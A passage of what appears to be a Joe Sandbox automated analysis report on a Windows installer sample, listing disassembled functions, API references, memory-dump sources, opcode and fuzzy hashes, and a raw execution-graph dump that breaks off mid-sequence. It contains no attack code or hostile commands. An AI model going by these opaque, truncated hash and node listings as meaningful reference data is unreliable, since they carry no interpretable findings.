                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ___std_exception_destroy
                            • String ID: Jbx$Jbx
                            • API String ID: 4194217158-1161259238
                            • Opcode ID: 0dc1b59af06a79023957020b919497c15184326130050f3209634544a674148e
                            • Instruction ID: 9d34a53dcdd51cd0699d22e6e6fc08ff8623fb12ac44223f6c7b833fd3cc1483
                            • Opcode Fuzzy Hash: 0dc1b59af06a79023957020b919497c15184326130050f3209634544a674148e
                            • Instruction Fuzzy Hash: 245104B29002058BCB14CF68D88069FBBF5FF89304F10846DE8599B751E33AE9C5CB92
                            Function 6C152F9C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: <dJ$Q
                            • API String ID: 3519838083-2252229148
                            • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                            • Instruction ID: 52135ae8753a6d4304718027478255ba4c0390de6cefb5507cdd800be54929bb
                            • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                            • Instruction Fuzzy Hash: C051B2B1900259EFCF01DFE8C8809EDB7B1FF59308F90852EE525AB650D735999ACB50
                            Function 6C14E9B9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $D^J
                            • API String ID: 3519838083-3977321784
                            • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                            • Instruction ID: fd60c0b7f90b2afd5b013fc59a60c0fcbc632667ae15ad867e3529835e7ee8b8
                            • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                            • Instruction Fuzzy Hash: 7B413D60A045A05ED726DF2884607E9FBA16F27348F24C198C4D247FC1DB695B8BC7D1
                            Function 6C1105EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C117DC6), ref: 6C11070B
                            • __dosmaperr.LIBCMT ref: 6C110712
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr
                            • String ID: 8Q
                            • API String ID: 1659562826-4022487301
                            • Opcode ID: ad608996fbfcaa8601f5d353190f70d46b86e18b230f17d1e95025c6ce0de8db
                            • Instruction ID: 15fc88814989c90e202cf3af6e32a6e8bb8a95e648a3691e9c8d2a74180b5f5f
                            • Opcode Fuzzy Hash: ad608996fbfcaa8601f5d353190f70d46b86e18b230f17d1e95025c6ce0de8db
                            • Instruction Fuzzy Hash: 47417C71A0C1D4AFDB11DF19C880BA97FE5EF86314F148169E8948BE41D7799C22CB90
                            Function 6C16812C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: X&L$p|J
                            • API String ID: 3519838083-2944591232
                            • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                            • Instruction ID: f4252885bd70ffa1dfdb13c151f7026b7b5f59ea7eb7876298d7abec80385441
                            • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                            • Instruction Fuzzy Hash: AC316939685904CFF700AB5ECD01BE97771EB23329F20012FD650A2EA2CB64C9E6CB51
                            Function 6C167C24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0|J$`)L
                            • API String ID: 3519838083-117937767
                            • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction ID: 38e2ef957f2793d2dd41173faac304fbba41140352cacff4304d5d8e9742424c
                            • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction Fuzzy Hash: A341B035601785DFDB119F61C8A07FABBE2FF55308F00482EE15A97B10CB35A958CB82
                            Function 6C16ACB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv
                            • String ID: 3333
                            • API String ID: 3732870572-2924271548
                            • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                            • Instruction ID: a2e2477e8ae694e01cb98732c048355068e246d2ae72727e08c9c6643ef809c0
                            • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                            • Instruction Fuzzy Hash: 622195B0A407146ED720CFAA8880B9BFAFDEB94755F10891EA186D7B40D774E9048B65
                            Function 6C163906 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$LuJ
                            • API String ID: 3519838083-205571748
                            • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction ID: 6e8191fd566e5c6a7819b698779b68ba478922de9eb2fd05ce561b28262dee22
                            • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction Fuzzy Hash: 9D018471E01315DADB10DF9AC4905AEF7B4FF66708F80842EE56AE3A41C3389905CF59
                            Function 6C13F0AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$xMJ
                            • API String ID: 3519838083-951924499
                            • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                            • Instruction ID: de7fbac89efcd8a344cbae7bb7c8dd05d4c2de1dad733d5c896e69178ac9b169
                            • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                            • Instruction Fuzzy Hash: 62113C71A01219DBCB00CFE9D49059EB7B4FF5930CB90D4AEE469E7740D3389A05CB95
                            Function 6C111418 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 6C111439
                            • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C10DD2A,?,00000004,?,4B42FCB6,?,?,6C102E7C,4B42FCB6,?), ref: 6C111475
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: AllocHeap_free
                            • String ID: 8Q
                            • API String ID: 1080816511-4022487301
                            • Opcode ID: 93b51bc809cc3691ebf21364e5668808fb321ec3fed80b2012ee5bfdd8901414
                            • Instruction ID: 92282384c9d0367f55a263c925ce81f94b9a9daacb59f09ef81feced1784fe62
                            • Opcode Fuzzy Hash: 93b51bc809cc3691ebf21364e5668808fb321ec3fed80b2012ee5bfdd8901414
                            • Instruction Fuzzy Hash: 85F0F63274E511AAEB111A279C04B8BB7789FF3FB9F318136E82596E80DF3CD40581A1
                            Function 6C166431 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prologctype
                            • String ID: |zJ
                            • API String ID: 3037903784-3782439380
                            • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                            • Instruction ID: 971bcaa07dda248443bac21f4c0b741338b6ee4fb65461586ee67a3132a8d925
                            • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                            • Instruction Fuzzy Hash: 7AE0E532602124DBE7148B4AC81179DF3A4FF64718F10401F9012E3E40CBB4A8108681
                            Function 6C15D143 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prologctype
                            • String ID: <oJ
                            • API String ID: 3037903784-2791053824
                            • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                            • Instruction ID: 4473cd284e9a3f26059ccfbed9ad42d6ab32b037240301a69cec46d47c714b30
                            • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                            • Instruction Fuzzy Hash: 2AE0E571A02110DBE704AF48C420BDEF7A8EF52714F52011EE021A3B51CBB5E810CB80
                            Function 6C1924AB Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @ K$DJ$T)K$X/K
                            • API String ID: 0-3815299647
                            • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                            • Instruction ID: b49743e3490fab6f9c4d7353a451ef2b68dec78eaf880f4424e9a5b75cf1e6fa
                            • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                            • Instruction Fuzzy Hash: CB91C3386053059BDB18EF64C4647EE73B2EF6130CF108819C8666BB85DB79E98EC751
                            Function 6C187E19 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: D)K$H)K$P)K$T)K
                            • API String ID: 0-2262112463
                            • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                            • Instruction ID: f42f86aa4019df046d6915e54a1039b7bb7611677f39c546a686c4dd0348013c
                            • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                            • Instruction Fuzzy Hash: FE51BF35A092099BDF10EF95D850BEEB7B1EF1531CF10445AF82567A80DB79D988CBE0

                            Execution Graph

                            Execution Coverage:4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0.4%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:55
                            execution_graph 73221 d1f190 73224 ca1e0c 73221->73224 73223 d1f1b0 73225 ca1e1c malloc 73224->73225 73226 ca1e15 73224->73226 73227 ca1e2a _CxxThrowException 73225->73227 73228 ca1e3e 73225->73228 73226->73225 73227->73228 73228->73223 73229 d269d0 73230 d269d7 malloc 73229->73230 73231 d269d4 73229->73231 73233 ccd948 73263 ccdac7 73233->73263 73235 ccd94f 73271 ca2e04 73235->73271 73238 ca2e04 2 API calls 73239 ccd987 73238->73239 73240 ccd9e7 73239->73240 73274 ca6404 73239->73274 73244 ccda0f 73240->73244 73261 ccda36 73240->73261 73299 ca1e40 free 73244->73299 73246 ccd9bf 73297 ca1e40 free 73246->73297 73247 ccda94 73312 ca1e40 free 73247->73312 73251 ccda17 73300 ca1e40 free 73251->73300 73253 ccd9c7 73298 ca1e40 free 73253->73298 73254 ccda9c 73313 ca1e40 free 73254->73313 73258 ccd9cf 73261->73247 73301 ca2da9 73261->73301 73304 ce04d2 73261->73304 73310 ca1524 malloc _CxxThrowException __EH_prolog ctype 73261->73310 73311 ca1e40 free 73261->73311 73264 ccdad1 __EH_prolog 73263->73264 73265 ca2e04 2 API calls 73264->73265 73266 ccdb33 73265->73266 73267 ca2e04 2 API calls 73266->73267 73268 ccdb3f 73267->73268 73269 ca2e04 2 API calls 73268->73269 73270 ccdb55 73269->73270 73270->73235 73272 ca1e0c ctype 2 API calls 73271->73272 73273 ca2e11 73272->73273 73273->73238 73314 ca631f 73274->73314 73277 ca6423 73318 ca2f88 73277->73318 73278 ca2f88 3 API calls 73278->73277 73281 cb7e5a 73282 cb7e64 __EH_prolog 73281->73282 73391 cb8179 73282->73391 73287 ca2fec 3 API calls 73288 cb7e9a 73287->73288 73289 ca2da9 2 API calls 73288->73289 73290 cb7ea7 73289->73290 73400 ca6c72 73290->73400 73294 cb7ecb 73295 cb7ed8 73294->73295 73502 ca757d GetLastError 73294->73502 73295->73240 73295->73246 73297->73253 73298->73258 73299->73251 73300->73258 73677 ca2d4d 73301->73677 73303 ca2dc6 73303->73261 73305 ce04df 73304->73305 73306 ce0513 73304->73306 73307 ce04fd 73305->73307 73308 ce04e8 _CxxThrowException 73305->73308 73306->73261 73680 ce0551 malloc _CxxThrowException free memcpy ctype 73307->73680 73308->73307 73310->73261 73311->73261 73312->73254 73313->73258 73315 ca9245 73314->73315 73324 ca90da 73315->73324 73319 ca2f9a 73318->73319 73320 ca2fbe 73319->73320 73321 ca1e0c ctype 2 API calls 73319->73321 73320->73281 73322 ca2fb4 73321->73322 73390 ca1e40 free 73322->73390 73325 ca90e4 __EH_prolog 73324->73325 73326 ca2f88 3 API calls 73325->73326 73328 ca90f7 73326->73328 73327 ca915d 73329 ca2e04 2 API calls 73327->73329 73328->73327 73333 ca9109 73328->73333 73330 ca9165 73329->73330 73331 ca91be 73330->73331 73334 ca9174 73330->73334 73374 ca6332 6 API calls 2 library calls 73331->73374 73345 ca6414 73333->73345 73365 ca2e47 73333->73365 73337 ca2f88 3 API calls 73334->73337 73335 ca917d 73363 ca91ca 73335->73363 73372 ca859e malloc _CxxThrowException free _CxxThrowException 73335->73372 73337->73335 73341 ca912e 73344 ca914d 73341->73344 73370 ca31e5 malloc _CxxThrowException free _CxxThrowException 73341->73370 73343 ca9185 73348 ca2e04 2 API calls 73343->73348 73371 ca1e40 free 73344->73371 73345->73277 73345->73278 73349 ca9197 73348->73349 73350 ca91ce 73349->73350 73351 ca919f 73349->73351 73352 ca2f88 3 API calls 73350->73352 73353 ca91b9 73351->73353 73373 ca1089 malloc _CxxThrowException free _CxxThrowException 73351->73373 73352->73353 73375 ca3199 malloc _CxxThrowException free _CxxThrowException 73353->73375 73356 ca91e6 73376 ca8f57 memmove 73356->73376 73358 ca91ee 73359 ca91f2 73358->73359 73377 ca2fec 73358->73377 73384 ca1e40 free 73359->73384 73385 ca1e40 free 73363->73385 73366 ca2e57 73365->73366 73366->73366 73386 ca2ba6 73366->73386 73369 ca8f57 memmove 73369->73341 73370->73344 73371->73345 73372->73343 73373->73353 73374->73335 73375->73356 73376->73358 73378 ca2ffc 73377->73378 73379 ca2ff8 73377->73379 73378->73379 73380 ca1e0c ctype 2 API calls 73378->73380 73383 ca31e5 malloc _CxxThrowException free _CxxThrowException 73379->73383 73381 ca3010 73380->73381 73389 ca1e40 free 73381->73389 73383->73359 73384->73363 73385->73345 73387 ca1e0c ctype 2 API calls 73386->73387 73388 ca2bbb 73387->73388 73388->73369 73389->73379 73390->73320 73394 cb8906 73391->73394 73392 cb7e77 73396 cc7ebb 73392->73396 73394->73392 73503 cb8804 free ctype 73394->73503 73504 ca1e40 free 73394->73504 73397 cb7e7f 73396->73397 73399 cc7ec6 73396->73399 73397->73287 73398 ca1e40 free ctype 73398->73399 73399->73397 73399->73398 73402 ca6c7c __EH_prolog 73400->73402 73401 ca6cd3 73404 ca6ce2 73401->73404 73407 ca6d87 73401->73407 73402->73401 73403 ca6cb7 73402->73403 73405 ca2f88 3 API calls 73403->73405 73406 ca2f88 3 API calls 73404->73406 73431 ca6cc7 73405->73431 73411 ca6cf5 73406->73411 73408 ca2e47 2 API calls 73407->73408 73416 ca6f4a 73407->73416 73409 ca6db0 73408->73409 73412 ca2e47 2 API calls 73409->73412 73410 ca6d4a 73522 ca7b41 28 API calls 73410->73522 73411->73410 73413 ca6d0b 73411->73413 73421 ca6dc0 73412->73421 73521 ca9252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 73413->73521 73415 ca6fd1 73423 ca70e5 73415->73423 73424 ca6fed 73415->73424 73444 ca701d 73415->73444 73416->73415 73419 ca6f7e 73416->73419 73418 ca6d5f 73523 ca764c 73418->73523 73543 ca6bf5 11 API calls 2 library calls 73419->73543 73420 ca6d36 73420->73410 73426 ca6d3a 73420->73426 73435 ca6dfe 73421->73435 73526 ca3221 malloc _CxxThrowException free _CxxThrowException 73421->73526 73505 ca6868 73423->73505 73545 ca6bf5 11 API calls 2 library calls 73424->73545 73426->73431 73429 ca6f85 73429->73423 73434 ca6f99 73429->73434 73501 ca1e40 free 73431->73501 73432 ca6ff2 73432->73423 73437 ca7006 73432->73437 73433 ca6fca 73440 ca6848 FindClose 73433->73440 73443 ca2f88 3 API calls 73434->73443 73436 ca6e43 73435->73436 73450 ca6e1e 73435->73450 73439 ca6c72 42 API calls 73436->73439 73437->73433 73442 ca6e4e 73439->73442 73440->73431 73445 ca6f3a 73442->73445 73446 ca6e41 73442->73446 73447 ca6fb0 73443->73447 73444->73423 73546 ca717b 13 API calls 73444->73546 73541 ca1e40 free 73445->73541 73527 ca2f1c 73446->73527 73544 ca717b 13 API calls 73447->73544 73450->73446 73455 ca2fec 3 API calls 73450->73455 73452 ca7052 73456 ca7056 73452->73456 73457 ca7064 73452->73457 73454 ca6f42 73542 ca1e40 free 73454->73542 73455->73446 73460 ca2f88 3 API calls 73456->73460 73462 ca2e47 2 API calls 73457->73462 73463 ca705f 73460->73463 73461 ca2e04 2 API calls 73487 ca6e83 73461->73487 73464 ca706d 73462->73464 73467 ca6848 FindClose 73463->73467 73547 ca1089 malloc _CxxThrowException free _CxxThrowException 73464->73547 73467->73431 73468 ca707b 73548 ca1089 malloc _CxxThrowException free _CxxThrowException 73468->73548 73469 ca6ecf 73534 ca1e40 free 73469->73534 73471 ca6ec7 SetLastError 73471->73469 73472 ca7085 73473 ca6868 12 API calls 73472->73473 73476 ca7095 73473->73476 73480 ca7099 wcscmp 73476->73480 73481 ca70bb 73476->73481 73477 ca6f11 73535 ca1e40 free 73477->73535 73479 ca6ed3 73533 ca31e5 malloc _CxxThrowException free _CxxThrowException 73479->73533 73480->73481 73484 ca70b1 73480->73484 73549 ca6bf5 11 API calls 2 library calls 73481->73549 73482 ca6f19 73536 ca6848 73482->73536 73490 ca2f88 3 API calls 73484->73490 73487->73469 73487->73471 73487->73479 73492 ca2e04 2 API calls 73487->73492 73530 ca6bb5 17 API calls 73487->73530 73531 ca22bf CharUpperW 73487->73531 73532 ca1e40 free 73487->73532 73488 ca70c6 73495 ca70d8 73488->73495 73500 ca7129 73488->73500 73493 ca714c 73490->73493 73492->73487 73552 ca1e40 free 73493->73552 73550 ca1e40 free 73495->73550 73497 ca6f2b 73540 ca1e40 free 73497->73540 73500->73484 73501->73294 73502->73295 73503->73394 73504->73394 73506 ca6872 __EH_prolog 73505->73506 73507 ca6848 FindClose 73506->73507 73509 ca6880 73507->73509 73508 ca68f6 73508->73433 73551 ca717b 13 API calls 73508->73551 73509->73508 73510 ca689b FindFirstFileW 73509->73510 73511 ca68a9 73509->73511 73510->73511 73512 ca68ee 73511->73512 73514 ca2e04 2 API calls 73511->73514 73512->73508 73559 ca6919 malloc _CxxThrowException free 73512->73559 73515 ca68ba 73514->73515 73553 ca8b4a 73515->73553 73517 ca68d0 73518 ca68e2 73517->73518 73519 ca68d4 FindFirstFileW 73517->73519 73558 ca1e40 free 73518->73558 73519->73518 73521->73420 73522->73418 73524 ca7656 CloseHandle 73523->73524 73525 ca7661 73523->73525 73524->73525 73525->73431 73526->73435 73528 ca2ba6 2 API calls 73527->73528 73529 ca2f2c 73528->73529 73529->73461 73530->73487 73531->73487 73532->73487 73533->73469 73534->73477 73535->73482 73537 ca6852 FindClose 73536->73537 73538 ca685d 73536->73538 73537->73538 73539 ca1e40 free 73538->73539 73539->73497 73540->73431 73541->73454 73542->73416 73543->73429 73544->73433 73545->73432 73546->73452 73547->73468 73548->73472 73549->73488 73550->73432 73551->73433 73552->73463 73560 ca8b80 73553->73560 73556 ca8b6e 73556->73517 73557 ca2f88 3 API calls 73557->73556 73558->73512 73559->73508 73562 ca8b8a __EH_prolog 73560->73562 73561 ca8b55 73561->73556 73561->73557 73562->73561 73563 ca8c7b 73562->73563 73569 ca8be1 73562->73569 73564 ca8d23 73563->73564 73565 ca8c8f 73563->73565 73566 ca8e8a 73564->73566 73568 ca8d3b 73564->73568 73565->73568 73572 ca8c9e 73565->73572 73567 ca2e47 2 API calls 73566->73567 73570 ca8e96 73567->73570 73571 ca2e04 2 API calls 73568->73571 73569->73561 73573 ca2e47 2 API calls 73569->73573 73579 ca2e47 2 API calls 73570->73579 73574 ca8d43 73571->73574 73576 ca2e47 2 API calls 73572->73576 73577 ca8c05 73573->73577 73657 ca6332 6 API calls 2 library calls 73574->73657 73590 ca8ca7 73576->73590 73584 ca8c17 73577->73584 73585 ca8c24 73577->73585 73578 ca8d52 73580 ca8d56 73578->73580 73658 ca859e malloc _CxxThrowException free _CxxThrowException 73578->73658 73581 ca8eb8 73579->73581 73668 ca1e40 free 73580->73668 73669 ca8f57 memmove 73581->73669 73647 ca1e40 free 73584->73647 73588 ca2e47 2 API calls 73585->73588 73587 ca8ec4 73593 ca8c35 73588->73593 73594 ca2e47 2 API calls 73590->73594 73648 ca8f57 memmove 73593->73648 73598 ca8cd0 73594->73598 73652 ca8f57 memmove 73598->73652 73600 ca8c41 73604 ca8c6b 73600->73604 73649 ca31e5 malloc _CxxThrowException free _CxxThrowException 73600->73649 73605 ca8cdc 73623 ca8d65 73623->73580 73647->73561 73648->73600 73652->73605 73657->73578 73658->73623 73668->73561 73669->73587 73678 ca2ba6 2 API calls 73677->73678 73679 ca2d68 73678->73679 73679->73303 73679->73679 73680->73306 73681 cca7c5 73699 cca7e9 73681->73699 73728 cca96b 73681->73728 73682 ccade3 73786 ca1e40 free 73682->73786 73683 